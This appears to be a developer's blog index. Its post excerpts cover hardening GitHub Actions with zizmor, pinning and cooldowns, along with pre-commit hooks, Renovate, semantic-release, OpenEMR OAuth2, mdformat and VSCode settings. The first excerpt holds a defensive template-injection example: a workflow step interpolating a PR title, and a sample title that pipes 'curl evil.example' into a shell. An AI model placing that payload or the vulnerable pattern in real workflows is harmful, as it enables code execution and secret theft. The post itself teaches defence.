
Blog

Harden your GitHub Actions Workflows with zizmor, dependency pinning, and dependency cooldowns

It's been a crazy week (or weeks?) for a lot of people, with several supply chain attacks. They all seem to have originated from the compromise of trivy (ironically, a security scanner). I wanted to understand how the attackers initially gained access to the secrets used in their GitHub organization, and found that an earlier attack had targeted the GitHub Actions workflows of open source projects.

Looking at the details of how the secrets were extracted, I noticed that the attacks all used similar techniques: unless I missed something, template injection and unsafe pull_request_target triggers. This could have been avoided, because all of those vulnerabilities (and more) can be found by zizmor, a static analysis tool for GitHub Actions!
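To illustrate the template-injection class of bug, here is a generic sketch (not taken from any of the affected projects; the step names are illustrative):

```yaml
# Vulnerable: the PR title is interpolated directly into the shell script.
# A title like `"; curl evil.example | sh #` runs arbitrary code.
- name: Greet
  run: echo "New PR: ${{ github.event.pull_request.title }}"

# Safer: pass untrusted input through an environment variable instead,
# so the shell treats it as data rather than script text.
- name: Greet
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "New PR: $PR_TITLE"
```

Combined with a pull_request_target trigger (which runs with access to the repository's secrets), an injection like the first variant is enough to exfiltrate secrets.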

The problem is that, unfortunately, GitHub Actions is NOT secure by default. One would think that following the official documentation leaves you with workflows that are secure and cannot be exploited. Last year I came across zizmor, and upon checking my workflows it pointed out several problems that I was quite surprised to find out about.

Of course, GitHub should make Actions more secure by default. And it seems that the latest attacks have finally helped to make some progress in that direction. GitHub has published a security roadmap for GitHub Actions and is looking for feedback from the community.

Until that happens, what can you do right now to harden your GitHub Actions workflows?
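Two of the measures from the title can be sketched right away. Pinning an action to a full commit SHA (instead of a mutable tag) means a compromised or moved tag cannot silently change what your workflow runs; the SHA below is a placeholder:

```yaml
steps:
  # Pin to an immutable commit SHA; the trailing comment records the tag
  # the SHA corresponds to, for humans and for update tooling.
  - uses: actions/checkout@<full-commit-sha>  # v4.2.2 (placeholder SHA)
```

For cooldowns, Renovate's minimumReleaseAge setting (for example, "minimumReleaseAge": "7 days") delays update PRs until a release has aged, so a compromised release is more likely to be discovered and yanked before it ever reaches your repository.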

Run npm ci as a pre-commit hook

This week I was updating a dependency in a node-based repository and several times forgot to commit the changes to package-lock.json as well.

The CI pipeline failed each time because it runs npm ci to ensure that the lock file is up to date.

I wondered whether I could catch this problem locally at commit-time via a pre-commit hook.

.pre-commit-config.yaml

```yaml
repos:
  - repo: local
    hooks:
      - id: npm-ci
        name: npm lockfile up to date
        language: node
        entry: npm ci --dry-run
        files: ^package(-lock)?\.json$
```

Actually, seeing this now makes me realize that --dry-run only skips the actual installation: npm ci never modifies the lock file either way, it simply fails when the lock file is out of sync with package.json. If you want the hook to update the lock file for you (so you can stage it for your commit), use npm install --package-lock-only as the entry instead.

Now, the CI job that runs pre-commit hooks via prek failed, because by default the system node version is used. At the time of this writing it has v20 installed, whereas our packages require v22 or even v24. There is a language_version property that could pin the node version; however, npm ci is already run in a dedicated job to actually install the dependencies, so in the end this hook is simply skipped in CI.

Updating pre-commit additional dependencies using Renovate

I am a huge fan of Renovate Bot to automatically update dependencies in projects. I use it in all my projects. At the time when I discovered it, we were using GitLab so we could not use dependabot.

In general, I quickly realized that Renovate Bot has significant advantages over dependabot (which, if I am not mistaken, is restricted to running on GitHub). Renovate is fully open source (and can be self-hosted), highly configurable, supports many dependency managers, supports custom managers with regex, and much more.

Renovate has had beta pre-commit support for quite some time; it needs to be enabled explicitly. I have been using it for a while and it works great for keeping pre-commit hooks up to date (pinning dependencies is generally recommended).
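Enabling it looks roughly like this in renovate.json (the pre-commit manager is disabled by default, so it must be switched on explicitly):

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": ["config:recommended"],
  "pre-commit": {
    "enabled": true
  }
}
```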

pre-commit hooks can have additional dependencies. These additional dependencies are specific to the language the hook uses. For example, let's assume you are using mdformat to format your Markdown files which supports additional plugins. mdformat is a Python tool so the additional dependencies are Python packages.

Here is an example pre-commit config that this website uses as of this writing:

.pre-commit-config.yaml (excerpt)

```yaml
  - repo: https://github.com/executablebooks/mdformat
    rev: 1.0.0
    hooks:
      - id: mdformat
        language: python
        args: [--number, --sort-front-matter, --strict-front-matter]
        additional_dependencies:
          - mdformat-mkdocs==5.1.4
          - mdformat-front-matters==2.0.0
          - mdformat-footnote==0.1.3
          - mdformat-gfm-alerts==2.0.0
          - mdformat-ruff==0.1.3
          - ruff==0.15.4
          - mdformat-config==0.2.1
```

Note: specifying the language is optional, but important here, as you will see when you keep reading.

How can we ensure that the additional dependencies get updated automatically as well?
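The details follow below, but the rough idea is a Renovate custom regex manager that parses the pinned additional_dependencies lines. Treat this as a sketch: the matchStrings pattern and the pypi datasource assumption (it only covers Python hooks) are illustrative, not a drop-in config:

```json
{
  "customManagers": [
    {
      "customType": "regex",
      "fileMatch": ["^\\.pre-commit-config\\.yaml$"],
      "matchStrings": ["- (?<depName>[\\w-]+)==(?<currentValue>[^\\s]+)"],
      "datasourceTemplate": "pypi"
    }
  ]
}
```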

Using semantic-release with an SSH deploy key in GitHub Actions

We use semantic-release to release new versions of one of our JavaScript-based web applications. semantic-release can help with various release-based activities, such as figuring out the version bump based on the commit history using conventional commits, updating the changelog, pushing a new version tag, and so on.

We recently migrated our repositories to GitHub and have a ruleset enabled for the main (default) branch to protect it. Rulesets are basically the new way of protecting a branch. For a single developer or a very small team this might be overkill and slow you down, but for bigger teams it definitely makes sense to ensure that certain practices are adhered to. For example, you can block force pushes, or require a pull request before merging.

This is where we ran into an issue: the release commit created by semantic-release could not be pushed directly to main because of this rule. GitHub allows you to grant bypass permissions for your ruleset. Unfortunately, you cannot add a single user to this bypass list, and the GITHUB_TOKEN secret is associated with the (special) github-actions[bot] user.

So, how were we able to accomplish this?
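The full details are in the post, but the core idea can be sketched: create an SSH deploy key with write access, add it as a bypass actor on the ruleset (rulesets allow deploy keys in the bypass list), store the private half as a repository secret, and check the repository out with it so that the push from semantic-release authenticates via the deploy key. The secret name here is an assumption:

```yaml
steps:
  - uses: actions/checkout@v4
    with:
      # Private half of the deploy key; checkout persists it so that
      # later `git push` invocations in the job authenticate over SSH.
      ssh-key: ${{ secrets.DEPLOY_KEY }}
```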

Authenticating as a system user with OpenEMR's FHIR API using OAuth2

At Opal we want to support the current industry standard in healthcare integration which is SMART on FHIR. This also makes sense given that Opal has a partnership with OpenEMR which supports this standard.

In this article I describe how to authenticate a backend service using the client_credentials grant in Python in two different ways (i.e., with two different packages). For example, this is required when making use of the Bulk Export API.
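As a taste of what the article covers, here is a minimal, generic client_credentials sketch using only the standard library. The token endpoint URL and scope are placeholders, and whether OpenEMR additionally requires a signed JWT client assertion for system clients is one of the details discussed in the article:

```python
import json
from urllib import parse, request


def build_token_request(client_id: str, client_secret: str, scope: str) -> dict:
    """Form payload for an OAuth2 client_credentials token request."""
    return {
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": scope,
    }


def fetch_token(token_url: str, payload: dict) -> str:
    """POST the form-encoded payload to the token endpoint, return the token."""
    data = parse.urlencode(payload).encode()
    with request.urlopen(request.Request(token_url, data=data)) as resp:
        return json.load(resp)["access_token"]
```

The returned bearer token is then sent in the Authorization header of subsequent FHIR requests.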

Formatting Markdown files with mdformat

At some point I was looking at the .pre-commit-config.yaml that the ruff project uses. Looking at how other projects do things, what tools they use, how they work, etc. is a great way to learn. I noticed several pre-commit hooks that were interesting, one of which was mdformat.

mdformat is "an opinionated Markdown formatter". It has a specific formatting style that cannot be configured. There are a few configuration options though.

The nice thing is that it has a plugin system giving you the ability to add support for syntax other than what is defined by CommonMark. In addition, there is also support for code formatter plugins to format code in fenced code blocks.

For example, for a project that uses MkDocs with the fantastic mkdocs-material theme (like this website), the mdformat-mkdocs plugin offers the necessary support. You can see the setup that this website uses in the corresponding .pre-commit-config.yaml.

Compatibility with markdownlint

I have been using markdownlint for a while. Since both tools support CommonMark they are basically compatible.

I run both tools via pre-commit hooks. First, mdformat, and then markdownlint-cli2 so that the linting is done on an already formatted file.

The one thing that does not work, unfortunately, is using a comment to disable a certain markdownlint rule for the next line: mdformat adds an empty line between the comment and the next line, which invalidates the rule suppression.
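For example, markdownlint's disable-next-line comment only takes effect when it sits directly above the offending line (MD013 is the line-length rule):

```markdown
<!-- markdownlint-disable-next-line MD013 -->
A deliberately very long line that should be exempt from the line-length rule.
```

After formatting, a blank line separates the comment from the long line, so the "next line" the comment refers to is empty and the rule fires again.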

Stopping VSCode Python Extension from Changing your Terminal Environment

I have tripped over an outdated environment variable a few times when running Python from within vscode. And I finally figured out what caused it.

We store our environment variables in a .env file that is then used by our Django application. We use the django-environ package for this. During development, this file is loaded on startup. When deployed, we provide the file via env_file in the compose file.

What happened in vscode is that when a value in .env changed, running something, such as pytest, would not see this new environment variable value.

After a while I noticed that there was a yellow warning sign next to the terminal process. Hovering over it reveals a popup asking you to relaunch the terminal because the environment changed. It took me a long time to figure this out in the first place; it's not something I expected, and it is not very intuitive.

In the past I had looked in the settings for where this was coming from and how it could be disabled, but could not find anything. Today I finally figured it out, after running into the issue again and wasting time until I realized why something did not work.

The popup also allows you to "Show Environment Contributions", which reveals that the Python VSCode extension contributes the variables and causes this behaviour. In Settings > Extensions > Python there is an entry called "Env File" that contains ${workspaceFolder}/.env. Remove the value and relaunch the terminal.
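Equivalently, in settings.json this corresponds to the python.envFile setting, which can be cleared:

```json
{
  "python.envFile": ""
}
```

Put this in the workspace settings if you only want to change the behaviour for one project, or in the user settings to change it everywhere.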

Now changes to your .env file won't affect your terminal's environment anymore.

Blog Relaunched

My blog has existed since 2011. The intent has always been to share knowledge I gained, whether for someone else or just for my future self. From the beginning I used WordPress, which makes it quite easy to set up a blog. There are also tons of themes and plugins that you can install and use.

Writing (especially in public) does not come naturally to me, and doing it in WordPress did not feel natural either. So for a while I was dreading creating new blog posts, because it was too cumbersome for multiple reasons.

Another difficulty was keeping WordPress up to date along with the plugins and any customizations to it. While it is fairly easy to customize CSS, JS, or the PHP code of themes and plugins, there is no easy way to keep those separate so that themes and plugins can be easily updated.

I switched to a containerized setup, putting as much as possible in a repository. This included customizations. My idea was that it would be easier to update themes and plugins and re-apply those customizations. In the end, it was still too much manual work, however. It's not as easy as merging a dependency update on your repository raised by Renovate (of which I am a huge fan) and automatically re-deploying.

A few years ago, I came across the amazing Material for MkDocs. It is a technical documentation theme for MkDocs with many great features. Documentation is written in Markdown and can be version controlled in a repository. This is basically "documentation as code".

I first introduced MkDocs at work a few years ago for various documentation sites. Together with Material for MkDocs it has been fantastic.

Since Material for MkDocs has a blog plugin, I had been wanting to switch to it for a while. I knew that it would allow me to write blog posts more naturally (in a text editor) and treat everything as code. I finally got around to it and migrated my old WordPress site to what is now a static site.

It is live now 😄.

Keep reading if you are interested in the details of how it is set up.